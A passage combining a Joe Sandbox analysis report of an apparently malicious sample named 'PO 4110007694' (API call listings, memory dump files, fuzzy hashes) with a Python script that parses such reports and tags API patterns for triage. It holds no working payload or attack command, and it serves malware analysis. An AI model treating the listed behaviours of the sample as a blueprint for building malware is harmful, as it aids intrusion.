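• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C858ED
• WSACleanup.WSOCK32 ref: 00C858F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
Similarity
• String ID: Ping
• API String ID: 1028309954-2246546115
• Instruction Fuzzy Hash: 3D51BE31644600DFDB20EF25CC89B6A77E4EF49314F04852AF966DB2E1DB70E941EB46
APIs
  • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
  • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C690FD
• GetDlgCtrlID.USER32 ref: 00C69108
• GetParent.USER32 ref: 00C69124
Similarity
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Instruction Fuzzy Hash: 8521C875A00208BBDF11ABA5CC89FFEBB78EF49300F10415AF521972A1DB755556EB20
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One "• Name.MODULE(args), ref: ADDR" line; the optional "Part of subcall
# function X:" prefix marks an API reached through the called function X.
API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<subcall>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list           # recovered arguments, "?" where the plugin could not resolve one
    ref: int             # call-site address
    subcall: int = None  # address of the intermediate function, None for a direct call


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "String ID", "Instruction Fuzzy Hash", ...
    associated: list = field(default_factory=list)

    def direct_api_names(self):
        return [a.name for a in self.apis if a.subcall is None]

    def strings(self):
        # The plugin joins a function's string references with "$".
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_blocks(text):
    """Split report text into FunctionBlock records; a bare "APIs" line opens a block."""
    blocks, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
        elif cur is None or not line.startswith("•"):
            continue  # blank lines and text outside any block
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(
                    m["name"], m["module"],
                    [a for a in (m["args"] or "").split(",") if a],
                    int(m["ref"], 16),
                    int(m["subcall"], 16) if m["subcall"] else None))
        else:
            key, _, value = line[1:].strip().partition(":")
            if key == "Associated":
                cur.associated.append(value.strip())
            else:
                cur.fields[key] = value.strip()
    return blocks


# Analyst-defined API sets for triage (assumption: tag names and sets are chosen
# here, they are not Joe Sandbox signature names). A block gets a tag when its
# direct calls include every API in the set.
PATTERNS = {
    "icmp_echo": {"IcmpCreateFile", "IcmpSendEcho", "IcmpCloseHandle"},
    "dialog_control_select": {"SendMessageW", "GetDlgCtrlID", "GetParent"},
}


def tag_block(block):
    names = set(block.direct_api_names())
    return sorted(tag for tag, need in PATTERNS.items() if need <= names)
```

Feed the whole report text to parse_blocks and the "Associated" values will still carry the "Download File" link label where the page has it fused onto the dump name; strip it before using the value as a dump identifier. The Instruction Fuzzy Hash in fields is the value to carry into a similarity search across other reports, and tag_block is the hook for mapping a block back to a behaviour signature.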
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C69014
                                                                    • GetDlgCtrlID.USER32 ref: 00C6901F
                                                                    • GetParent.USER32 ref: 00C6903B
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C6903E
                                                                    • GetDlgCtrlID.USER32(?), ref: 00C69047
                                                                    • GetParent.USER32(?), ref: 00C69063
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C69066
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
                                                                    • Instruction ID: a723bea567cae1e7177270bf36170ef9495c8e6ca444af4dda73f34c13240e32
                                                                    • Opcode Fuzzy Hash: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
                                                                    • Instruction Fuzzy Hash: 1621B674A00208BFDF15ABA0CC89FFEBB79EF49310F10025AF961972E1DB755955EA20
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C690FD
                                                                    • GetDlgCtrlID.USER32 ref: 00C69108
                                                                    • GetParent.USER32 ref: 00C69124
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C69127
                                                                    • GetDlgCtrlID.USER32(?), ref: 00C69130
                                                                    • GetParent.USER32(?), ref: 00C6914C
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C6914F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
                                                                    • Instruction ID: 7349c9ace7cff4a8d706922f9c5dee65790b4076194d58b5eb80cdb557d80dd8
                                                                    • Opcode Fuzzy Hash: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
                                                                    • Instruction Fuzzy Hash: 8521C875A00208BBDF11ABA5CC89FFEBB78EF49300F10415AF521972A1DB755556EB20
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00C6916F
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00C69184
                                                                    • _wcscmp.LIBCMT ref: 00C69196
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C69211
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
                                                                    • Instruction ID: 73b12cbba52fb3ab19d472d695b414008908de2ac0db1d43ce343dbd53e08c40
                                                                    • Opcode Fuzzy Hash: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
                                                                    • Instruction Fuzzy Hash: 6F11EC36248307B9FE312665DC5BEAB379CDB15720F20013AF910E54E1FE7159516954
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00C888D7
                                                                    • CoInitialize.OLE32(00000000), ref: 00C88904
                                                                    • CoUninitialize.OLE32 ref: 00C8890E
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00C88A0E
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C88B3B
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CA2C0C), ref: 00C88B6F
                                                                    • CoGetObject.OLE32(?,00000000,00CA2C0C,?), ref: 00C88B92
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00C88BA5
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C88C25
                                                                    • VariantClear.OLEAUT32(?), ref: 00C88C35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
                                                                    • Instruction ID: 1da7ee4d0acd39b0a50785f9b618226117ce093f0d112deda5a96c74e1984f00
                                                                    • Opcode Fuzzy Hash: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
                                                                    • Instruction Fuzzy Hash: 06C135B1208305AFD700EF64C88496AB7E9FF89348F40492DF58ADB251DB71ED4ACB56
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C77A6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: 32f2615bb4cd09673d143504392d7427cb0766938bafa860ec90f5d1db823ca7
                                                                    • Instruction ID: f0eab3af07f990f92ca3e222c12c52230230730bd28e72252d209fd2bcd38c5d
                                                                    • Opcode Fuzzy Hash: 32f2615bb4cd09673d143504392d7427cb0766938bafa860ec90f5d1db823ca7
                                                                    • Instruction Fuzzy Hash: A4B19C7190421E9FDB01DFA4C885BBEB7B8FF09321F208529E619E7251D734E941DB91
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C711F0
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C71204
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00C7120B
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C7121A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7122C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71245
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71257
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C7129C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712B1
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
                                                                    • Instruction ID: cf1ff42b42688a4692964afbb4dc8ee27f12f0de0a8c99ae2035dc3a322c3a68
                                                                    • Opcode Fuzzy Hash: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
                                                                    • Instruction Fuzzy Hash: BD319E75601704FBDB209F98EC88F6D77A9EB54311F24812AFD18D61A1E7B49E40CB60
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C1FAA6
                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00C1FB45
                                                                    • UnregisterHotKey.USER32(?), ref: 00C1FC9C
                                                                    • DestroyWindow.USER32(?), ref: 00C545D6
                                                                    • FreeLibrary.KERNEL32(?), ref: 00C5463B
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C54668
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
                                                                    • Instruction ID: 45110a2b7c8692468f1c28fbcda1786fb4886a03dcdda065ea19dba5093483b7
                                                                    • Opcode Fuzzy Hash: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
                                                                    • Instruction Fuzzy Hash: 0DA17034301212CFCB29EF14C5A4BA9F364AF06705F5442ADE80AAB251DB30ED97EF94
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00C6A439), ref: 00C6A377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
                                                                    • Instruction ID: 69f00f6b6ec0e988dca48dd48757d39e91680ddf1820f979eeff3de127cffd09
                                                                    • Opcode Fuzzy Hash: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
                                                                    • Instruction Fuzzy Hash: FF91A571604605EACB18DFA0C492BEDFBB4FF05300F548129E85AB7251DF31AA99EF91
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00C12EAE
                                                                      • Part of subcall function 00C11DB3: GetClientRect.USER32(?,?), ref: 00C11DDC
                                                                      • Part of subcall function 00C11DB3: GetWindowRect.USER32(?,?), ref: 00C11E1D
                                                                      • Part of subcall function 00C11DB3: ScreenToClient.USER32(?,?), ref: 00C11E45
                                                                    • GetDC.USER32 ref: 00C4CD32
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C4CD45
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C4CD53
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C4CD68
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00C4CD70
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C4CDFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
                                                                    • Instruction ID: b75d486d1f4763d1b9b9a19bc50e484b6d9ecd2061d27ee0c688b565afaea80e
                                                                    • Opcode Fuzzy Hash: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
                                                                    • Instruction Fuzzy Hash: D771DC35901209DFCF618F64C8C4AFA3BB5FF49321F14427AED659A2B6C7318991EB60
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C81A50
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C81A7C
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C81ABE
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C81AD3
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81AE0
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C81B10
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00C81B57
                                                                      • Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
                                                                      • Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 2603140658-3916222277
                                                                    • Opcode ID: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
                                                                    • Instruction ID: 179d34ecd63109467328b0f88275207c5798fadfadbe8bf6436909d2546c89ce
                                                                    • Opcode Fuzzy Hash: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
                                                                    • Instruction Fuzzy Hash: C9414CB1501218BFEB15AF51CC89FFF7BACEB08358F04412AFD159A141E7709E469BA8
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C9F910), ref: 00C88D28
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C9F910), ref: 00C88D5C
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C88ED6
                                                                    • SysFreeString.OLEAUT32(?), ref: 00C88F00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
                                                                    • Instruction ID: 56d659fd501a70e7f07a78a61ad3d5e333917f8c48def7d2c73951c566f49e5f
                                                                    • Opcode Fuzzy Hash: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
                                                                    • Instruction Fuzzy Hash: 4CF15B71A00209EFCF14EF94C888EAEB7B9FF49318F148458F915AB251DB31AE46DB54
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C8F6B5
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F848
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F86C
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8AC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8CE
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8FA4A
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C8FA7C
                                                                    • CloseHandle.KERNEL32(?), ref: 00C8FAAB
                                                                    • CloseHandle.KERNEL32(?), ref: 00C8FB22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 3dd890b467fd0a44818053eb178a3c4bc62d288958dd45332639242ec46f661f
                                                                    • Instruction ID: 5bdf312a89191673b26e1b3495d4326cea6d1d3d82b47a64d03290515fe5a470
                                                                    • Opcode Fuzzy Hash: 3dd890b467fd0a44818053eb178a3c4bc62d288958dd45332639242ec46f661f
                                                                    • Instruction Fuzzy Hash: 52E1A1316043009FDB14EF24C891B6EBBE1EF85318F14856DF8999B2A2CB31DD46EB56
                                                                    APIs
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4
                                                                      • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00C74D40
                                                                    • _wcscmp.LIBCMT ref: 00C74D5A
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00C74D75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
